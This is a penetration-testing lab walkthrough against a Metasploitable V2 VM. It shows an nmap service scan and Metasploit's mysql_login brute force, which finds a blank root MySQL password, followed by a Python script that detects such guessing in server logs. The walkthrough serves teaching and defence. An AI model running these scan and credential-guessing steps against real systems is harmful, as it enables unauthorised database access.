
- Systems used

Kali Linux

Metasploitable V2 Linux


( Kali )

# nmap -sV 192.168.17.134    /* Metasploitable V2 Server IP */

 

 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-09 19:56 KST

mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers

mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers

Nmap scan report for 192.168.17.134

Host is up (0.00010s latency).

Not shown: 977 closed ports

PORT     STATE SERVICE     VERSION

21/tcp   open  ftp         vsftpd 2.3.4

22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp   open  telnet      Linux telnetd

25/tcp   open  smtp        Postfix smtpd

53/tcp   open  domain      ISC BIND 9.4.2

80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp  open  rpcbind     2 (RPC #100000)

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

512/tcp  open  exec        netkit-rsh rexecd

513/tcp  open  login

514/tcp  open  tcpwrapped

1099/tcp open  rmiregistry GNU Classpath grmiregistry

1524/tcp open  shell       Metasploitable root shell

2049/tcp open  nfs         2-4 (RPC #100003)

2121/tcp open  ftp         ProFTPD 1.3.1

3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

5900/tcp open  vnc         VNC (protocol 3.3)

6000/tcp open  X11         (access denied)

6667/tcp open  irc         UnrealIRCd

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

MAC Address: 00:0C:29:FA:DD:2A (VMware)

Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds


 


# cd /usr/share/metasploit-framework/data/wordlists

# vi user.txt

 

root

admin

administrator

 

# echo "" > pass.txt



# msfconsole

 

 

msf > search mysql_login


Matching Modules

================


   Name                                 Disclosure Date  Rank    Description

   ----                                 ---------------  ----    -----------

   auxiliary/scanner/mysql/mysql_login                   normal  MySQL Login Utility



msf > use auxiliary/scanner/mysql/mysql_login 

msf auxiliary(mysql_login) > show options


Module options (auxiliary/scanner/mysql/mysql_login):


   Name              Current Setting  Required  Description

   ----              ---------------  --------  -----------

   BLANK_PASSWORDS   false            no        Try blank passwords for all users

   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5

   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database

   DB_ALL_PASS       false            no        Add all passwords in the current database to the list

   DB_ALL_USERS      false            no        Add all users in the current database to the list

   PASSWORD                           no        A specific password to authenticate with

   PASS_FILE                          no        File containing passwords, one per line

   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]

   RHOSTS                             yes       The target address range or CIDR identifier

   RPORT             3306             yes       The target port (TCP)

   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host

   THREADS           1                yes       The number of concurrent threads

   USERNAME                           no        A specific username to authenticate as

   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line

   USER_AS_PASS      false            no        Try the username as the password for all users

   USER_FILE                          no        File containing usernames, one per line

   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS 192.168.17.134

RHOSTS => 192.168.17.134

msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt
msf auxiliary(mysql_login) > run

[*] 192.168.17.134:3306   - 192.168.17.134:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.17.134:3306   - MYSQL - Success: 'root:'
[-] 192.168.17.134:3306   - 192.168.17.134:3306 - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.17.50' (using password: NO))
[-] 192.168.17.134:3306   - 192.168.17.134:3306 - LOGIN FAILED: administrator: (Incorrect: Access denied for user 'administrator'@'192.168.17.50' (using password: NO))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(mysql_login) > quit
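
Seen from the server side, the run above leaves a recognizable trace: one source address denied for several account names in a row, each with "using password: NO". The following is an added example, not part of the original post, that groups such denial messages by source. The log lines, the timestamps, the 'webapp' user and the 192.168.17.60 address are constructed, and where the message ends up in your logs is an assumption.

```python
import re
from collections import defaultdict

# Matches the server's denial message as it appears in the run output above.
DENIED = re.compile(
    r"Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)

# Constructed sample lines (timestamps and the second source are made up).
SAMPLE_LOG = """\
171109 19:58:01 [Warning] Access denied for user 'admin'@'192.168.17.50' (using password: NO)
171109 19:58:01 [Warning] Access denied for user 'administrator'@'192.168.17.50' (using password: NO)
171109 20:03:44 [Warning] Access denied for user 'webapp'@'192.168.17.60' (using password: YES)
171109 20:05:10 [Note] /usr/sbin/mysqld: ready for connections.
"""


def summarize(log_text):
    """Group denied logins by source address."""
    stats = defaultdict(lambda: {"users": set(), "blank": 0, "total": 0})
    for line in log_text.splitlines():
        m = DENIED.search(line)
        if not m:
            continue  # not a denial message
        entry = stats[m.group("src")]
        entry["users"].add(m.group("user"))
        entry["total"] += 1
        if m.group("pw") == "NO":
            entry["blank"] += 1  # client sent no password at all
    return dict(stats)


def suspicious_sources(log_text, min_users=2):
    """Sources denied for at least min_users distinct account names."""
    flagged = []
    for src, e in sorted(summarize(log_text).items()):
        if len(e["users"]) >= min_users:
            flagged.append((src, sorted(e["users"]), e["blank"]))
    return flagged


if __name__ == "__main__":
    for src, users, blank in suspicious_sources(SAMPLE_LOG):
        print(f"{src}: denied for {users}, {blank} blank-password attempts")
```

The successful 'root' login with a blank password produces no denial message, so this check only sees the failed guesses around it; the account itself still needs a password set.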